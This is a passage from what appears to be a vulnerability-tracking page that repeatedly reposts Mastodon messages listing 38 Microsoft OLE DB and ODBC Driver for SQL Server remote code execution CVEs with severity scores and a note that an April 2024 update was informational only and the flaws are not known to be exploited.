  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28934
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28930
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28910
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:36

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
